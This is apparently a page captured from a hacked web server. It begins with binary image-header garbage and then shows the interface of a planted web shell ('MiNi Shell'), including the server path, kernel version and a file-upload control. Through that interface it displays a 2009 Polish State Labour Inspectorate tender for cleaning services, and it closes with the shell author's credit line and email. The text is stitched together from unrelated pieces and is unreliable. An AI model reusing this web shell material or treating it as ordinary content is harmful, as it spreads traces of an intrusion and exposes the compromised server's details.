JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090306/52044-N-2009.html

<p class="kh_header"><b>Warszawa: Sprzątanie pomieszczeń biurowych i mieszkań służbowych PIP GIP</b><br>
<b>Numer ogłoszenia: 52044 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Inspekcja Pracy Główny Inspektorat Pracy , ul. Krucza 38/42, 00-926 Warszawa, woj. mazowieckie, tel. 022 6619423, 4203754, faks 022 6284113, 6287909.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pip.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Nadzór nad warunkami pracy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń biurowych i mieszkań służbowych PIP GIP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie pomieszczeń biurowych i mieszkań służbowych PIP GIP.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca nie może podlegać wykluczeniu z ubiegania się o udzielenie zamówienia - na podstawie art. 22 ust 1 i art. 24 ust.1 i ust. 2 Pzp  oraz rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, tj. wykonawca:  
1) musi posiadać niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponować osobami zdolnymi do wykonania zamówienia, tj. 
a) musi wykazać się wykonaniem (w ciągu ostatnich 3 lat od dnia wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie) co najmniej  2 usługami odpowiadającymi swoim rodzajem i wartościom przedmiotowi zamówienia, tj. musi wykazać się sprzątaniem (2 usługi) co najmniej 1.000 m2 powierzchni biurowej przez okres co najmniej 12 miesięcy (każda usługa oddzielenie);
b) musi dysponować osobami zdolnymi do wykonania zamówienia, tj. (minimum 5 osób - dotyczy mieszkania i po 1 osobie do każdego mieszkania) - osoby te muszą mieć minimum roczne doświadczenie w sprzątaniu pomieszczeń biurowych oraz co najmniej 1 osobą, która będzie sprawowała nadzór nad osobami sprzątającymi;
c) musi dysponować następującym sprzętem - minimum: 
- pięć przemysłowymi odkurzaczami nie starszymi niż wyprodukowane w roku 2007 roku o mocy minimum 3.000 W;
- pięciu wózkami do przemieszczania sprzętu i materiałów czystościowych;
2) musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wykonawca musi posiadać zdolność kredytową lub środki finansowe w wysokości 50.000,00 zł;
3) nie może podlegać wykluczeniu z ubiegania się o udzielenie zamówienia publicznego na podstawie art. 24 ustawy Prawo zamówień publicznych. 
Ocena spełnienia warunków udziału w postępowaniu - ocena: 0 lub 1. Zamawiający uzna, że wykonawca spełnia wszystkie warunki udziału w postępowaniu, w przypadku załączenia do oferty wszystkich dokumentów wskazanych w ogłoszeniu  potwierdzających spełnienie warunków udziału w przedmiotowym postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wymagane dokumenty: 
1)	Krajowy rejestr sądowy firmy lub/i inne odpowiednie dokumenty uprawniający do wykonywania działalności na terenie RP (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej Polskiej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej Polskiej, podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości;
2)	Zaświadczenie z Urzędu Skarbowego (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie zalega z uiszczeniem podatków albo że uzyskał przewidziane prawem zezwolenie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie właściwego organu;
3)	Zaświadczenie z Zakładu Ubezpieczeń Społecznych/Kasy Rolniczego Ubezpieczenia Społecznego (podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie zalega z uiszczeniem opłat składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zezwolenie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie właściwego organu;
4)	Informacja z Krajowego Rejestru Karnego (członkowie władz i podmiot zbiorowy) podmiot mający siedzibę lub miejsce zamieszkania na terenie Rzeczypospolitej)/jeżeli ofertę składa podmiot mający siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej podmiot ten składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
5)	Oświadczenie o niepodleganiu wykluczeniu wykonawcy z przetargu zgodnie z art. 22 i 24 Pzp
6)	Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanychusług, w ciągu ostatnich 3 lat od dnia wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej 2 usług odpowiadających swoim rodzajem i wartościom przedmiotowi zamówienia, tj. sprzątanie co najmniej 1.000 m2 powierzchni biurowej przez okres co najmniej 12 miesięcy;
7)	Potwierdzenia od podmiotów na rzecz, których usługi zostały wykonane, że usługi, o których mowa w pkt 6 zostały wykonane należycie. 
8)	Wykaz zmechanizowanego sprzętu, który wykonawca zamierza zastosować do realizacji usługi - obejmujący minimum: pięć przemysłowych odkurzaczy nie starszych niż wyprodukowane w roku 2007 roku o mocy minimum 3.000 W i pięciu wózków do przemieszczania sprzętu i materiałów czystościowych;
9)	Wykaz osób, które będą świadczyły usługę sprzątania pomieszczeń biurowych (minimum 5 osób - dotyczy mieszkania i po 1 osobie do każdego mieszkania) - osoby te muszą mieć minimum roczne doświadczenie w sprzątaniu pomieszczeń biurowych oraz co najmniej 1 osoby, która będzie sprawowała nadzór nad osobami sprzątającymi;
10)    Lista środków, które będą użyte do sprzątania. Lista ma obejmować, co najmniej następujące środki:
a)	środek do czyszczenia płytek, 
b)	środek do czyszczenia fug, 
c)	środek do czyszczenia sanitariatów, 
d)	środek do czyszczenia luster i innych szklanych oraz plastikowych powierzchni, 
e)	środek do czyszczenia siedzisk oraz oparć krzeseł i foteli tapicerowanych, 
f)	środek do usuwania plam z powierzchni tapicerowanych, wykładzin i dywanów, 
g)	środek do wycierania kurzu, 
h)	środek do konserwacji mebli - zwykłych - meble biurowe, 
i)	środek do konserwacji mebli - w sali konferencyjnej (okleina naturalna);
j)	środek do mycia umywalek w kuchni oraz łazience, 
k)	środek do mycia baterii w kuchni oraz łazience
l)	środek do mycia i podłóg w kuchni i palarni,  
m)	środek do froterowania podłogi w palarni, 
n)	środek do czyszczenia kratek wentylacyjnych, 
o)	środek do czyszczenia listew przypodłogowych, 
p)	środek do czyszczenia koszy na śmieci i popielniczek, 
q)	środek do czyszczenia klamek i szyldów, 
r)	środek do czyszczenia drzwi, 
s)	środek do czyszczenia pojemników na mydło, papier i ręczniki,  
t)	środek do dezynfekcji sanitariatów i umywalek, 
u)	środek do dezynfekcji płytek, 
v)	środek do usuwania kamienia z sanitariatów i umywalek, 
w)	środek do usuwania kamienia z baterii, 
x)	środek do usuwania kamienia z płytek, 
y)	środek do mycia podłóg w łazienkach, 
z)	środek do czyszczenia mebli skórzanych, 
aa)	środek do konserwacji mebli skórzanych, 
bb)	środek do mycia podłóg drewnianych, 
cc)	środek do konserwacji podłóg drewnianych; 
dd)	środek do czyszczenia ram;
ee)	środek do dezynfekcji telefonów i faksów;
ff)	papier do WC;
gg)	żel zapachowy do WC;
hh)	mydło w płynie;
ii)	kostka do WC z koszykiem;
jj)	ręczniki papierowe;
2.   Dokumenty, o których mowa w:
a)    pkt  1.1 i 1.4  mają być wystawione nie wcześniej niż na 6 miesięcy przed upływem terminu  składania ofert;
b)    pkt 1.2 i 1.3 mają być wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania oferty.
3. Dotyczy podmiotu mającego siedzibę lub miejsce zamieszkania poza terenem Rzeczypospolitej - Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1.1 - 1.4 należy zastąpić je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.  
4.    Dokumenty, o których mowa w pkt 1.5, 1.6 i 1.8 - 1.10 mają być załączone do oferty w formie oryginałów. Pozostałe dokumenty mogą być załączone do oferty w formie kopii potwierdzonej przez wykonawcę. Zamawiający dopuszcza by wszystkie dokumenty były załączone do oferty w formie oryginałów. Zamawiający dopuszcza by potwierdzenia należytego wykonania usług były załączone w formie kserokopii. 
5.       W przypadku podmiotu wspólnego, o którym mowa w art. 23 Pzp:
a)      warunek wskazany w pkt 1.6, 1.8 i 1.9 mogą spełniać łącznie wszystkie podmioty wchodzące w skład podmiotu wspólnego;
b)       dokumenty, o których mowa w pkt 1.1 - 1.5 ma złożyć każdy podmiot wchodzący w skład podmiotu wspólnego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pip.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PIPGIP ul. Krucza 38/42, Warszawa, pok. 405..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 09:00, miejsce: PIPGIP ul. Krucza 38/42, Warszawa, pok. 405 (wejscie od ulicy Żurawiej 6/12).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com